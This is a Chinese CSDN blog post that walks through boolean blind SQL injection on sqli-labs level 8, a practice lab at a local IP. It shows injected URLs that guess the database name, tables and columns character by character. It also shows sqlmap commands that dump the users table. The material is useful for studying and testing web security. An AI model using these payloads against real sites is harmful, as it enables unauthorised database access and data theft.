sql盲注

最新推荐文章于 2024-04-23 09:08:55 发布
最新推荐文章于 2024-04-23 09:08:55 发布
阅读量7.5k 收藏 4
点赞数 1
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55710577/article/details/124056911
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

sql注入--盲注

前言

靶场环境:sqli-labs-master 第8关
注入攻击的本质:把用户的输入当作代码执行。
其中存在两个关键条件:
(1)用户可以控制输入。
(2)用户的输入被拼接到原代码上被执行。

提示:以下是本篇文章正文内容,下面案例可供参考

一、什么是盲注

所谓盲注便是在服务器没有错误回显的时候完成的注入攻击。sql盲注主要分为三类,分别是布尔盲注、延时盲注(也叫时间盲注)、报错盲注。

二、步骤示例

1.测试注入点


http://192.168.159.130/sqli-labs-master/Less-8/?id=1' and 1=2 --+
#id 处存在注入点

2.测所在数据库长度

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (length(database()))=8 --+

3. 利用ASCII码猜当前数据库名

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr(database(),1,1)))=115 --+

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr(database(),2,1)))=101 --+

以此类推,可以通过ASCII码所对应的值得到数据库名。

4.利用ASCII码查询表名

具体查询过程跟查数据库名基本一样

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 --+

过程跟上述命令类似,只是有少许不同,相关的一些命令会在后面给出

5、利用ASCII码查询字段名

http://192.168.159.130/sqli-labs-master/Less-8/?id=1'  and (ascii(substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),1,1)))=105 --+

sql手注所用到的函数总结

length() #返回字符串的长度
substr() #截取字符串 (语法:substr(str,pos,len);ascii()  #反回字符的ascii码

如上所述,利用手注进行盲注非常麻烦,因此我们可以利用工具进行sql注入

sqlmap进行sql盲注

1.寻找注入点,

sqlmap -u  192.168.159.130/sqli-labs-master/Less-8/?id=1

请添加图片描述
由图中可以看出,sql注入类型为bool盲注
2、查库名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 --current-db

请添加图片描述
3、查表名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 -D security --tables

请添加图片描述
4、查字段名

sqlmap -u 192.168.159.130/sqli-labs-master/Less-8/?id=1 -D security -T users --dump

请添加图片描述

吃泡面不喝汤
关注
SQL盲注(原理概述、分类)
小赵同学的博客
12-29 2万+
盲注原理 盲注的分类 盲注常用函数 盲注的利用方法 一、SQL盲注概述 1.如果数据库运行返回结果时只反馈对错不会返回数据库中的信息 此时可以采用逻辑判断是否正确的盲注来获取信息。 2.盲注是不能通过直接显示的途径来获取数据库数据的方法。 盲注可以分为三类: 布尔盲注 时间盲注 报错型盲注 1、布尔盲注 盲注查询是不需要返回结果的,仅判断语句是否正常执行即可,所以其返回可以看到一个布尔值,正常显示为true,报错或者是其他不正常显示为False 查询语句: SELECT userid FROM ne
Hakuin:一款自动化SQL盲注(BSQLI)安全检测工具
最新发布
FreeBuf_的博客
07-24 2210
Hakuin是一款功能强大的SQL盲注漏洞安全检测工具,该工具专门针对BSQLi设计,可以帮助广大研究人员优化BSQLi测试用例,并以自动化的形式完成针对目标Web应用程序的漏洞扫描与检测任务。该工具允许用户以轻松高效的形式对目标Web应用程序执行BSQLi安全检测,并采用了多种优化方法,包括预训练和自适应语言模型、机会性猜测和并行性机制等。由于该工具基于Python 3开发,因此我们首先需要在本地设备上安装并配置好最新版本的Python 3环境。本项目的开发与发布遵循。
SQL盲注
weixin_59872639的博客
02-18 2477
盲注SQL注入过程中,SQL语句执行后,选择的数据不能回显到前端页面,此时需要利用一些方法进行判断或者尝试,这个过程称之为盲注。 在盲注中,攻击者根据其返回页面的不同来判断信息(可能是页面内容的不同,也可以是响应时间不同)。一般情况下,盲注可分为两类: 基于布尔的盲注(Boolean based) 基于时间的盲注(Time based) 基于布尔的盲注 某些场合下,页面返回的结果只有两种(正常或错误) 。通过构造SQL判断语句,查看页面的返回结果(True or False)来判断哪些S
Sql盲注
qq_40077103的博客
09-17 1707
盲注就是sql语句注入后并且成功执行,但是执行的结果不能返回前端,所以需要通过一些其他信息间接推断数据。 盲注分为三类 一、基于布尔的盲注 基于布尔的盲注使用逻辑判断推测获取的数据,通过给定条件,服务器返回真或假使用二分法或者正则表达式等方法缩小判断的范围。 通常会使用sql中的截取字符串函数,以下是一些常见的函数 mid(column_name,start[,length])  #co...
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.csdn.net/csdn_Pade/article/details/82886765
BurpSuite辅助SQL盲注安装教程
03-10
BurpSuite辅助SQL盲注安装教程
多线程+二分法的巧用——通达OA SQL盲注1
08-03
【多线程+二分法在SQL盲注中的应用——以通达OA为例】 SQL盲注SQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询,利用服务器的响应时间或状态来推断数据库的信息。在这个案例中,...
python编写的sql盲注
10-28
python编写的sql盲注
网络安全 | 2万字总结】SQL盲注?这一篇就够了。
热门推荐
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在盲注(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为"盲注"。在盲注攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
SQL 盲注
白菜执笔人的博客
02-29 615
Web安全攻防 学习笔记 一、SQL 盲注 1.1、盲注介绍         Blind SQL盲注)是注入攻击的其中一种,向数据库发生 true 或 false 这样的问题,并根据应用程序返回的信息判断结果。这种攻击的出现是因为应用程序配置为只显示常规错误,但并没有 解决 SQL 注入存在的代码问题。 1.2、盲注种类 布尔类型的盲注 时间...
SQL注入之盲注
胖虎的博客
11-15 1834
sql注入之布尔类型的盲注,结合burpsuite工具实现半自动化
sql注入(盲注
2302_79119987的博客
04-23 2181
时间盲注又称延迟注入,其主要特征是利用sleep函数,制造时间延迟,由回显时间来判断是否报错。如果页面延迟五秒,说明正确。注入语句与布尔盲注相似,但是过程太繁琐一般使用自动化注入。可以使用脚本进行猜测:(使用时做出修改)# 将url 替换成你的靶场关卡网址# 修改两个对应的payload# 目标网址(不带参数)# 猜解长度使用的payload# 枚举字符使用的payload(ascii(substr(,{n},1)) ={r})# 获取长度。
SQL注入-盲注
m0_53820621的博客
08-12 758
SQL注入-盲注
SQL注入---盲注
zhoutong2323的博客
04-05 754
注是一种SQL注入攻击的形式,在这种攻击中,攻击者向目标应用程序发送恶意注入代码,然后通过观察应用程序的响应来推断出数据库中的信息。与常规的SQL注入攻击不同的是,盲注攻击是页面不会将报错信息回显以及没有明显回显位的情况下,页面不直接返回任何有关数据库的具体错误信息,导致攻击者无法直接获得数据库中的数据。盲注可以分为基于布尔逻辑的盲注和基于时间的盲注两种形式。基于布尔逻辑的盲注:攻击者通过在恶意注入代码中利用布尔逻辑运算符(如AND、OR)来判断条件是否为真,从而推断出数据库中的信息。例如,攻击者可以通过尝
SQL盲注攻击技术详解
"这篇文档是关于SQL盲注攻击技术的综述,由Javaphile撰写,适合学习数据库安全的人员阅读。文章首先定义了SQL注入及其风险,并回顾了现有的解决方案及其不足。接着,它讨论了在服务器仅给出最小响应的情况下如何识别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

吃泡面不喝汤

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值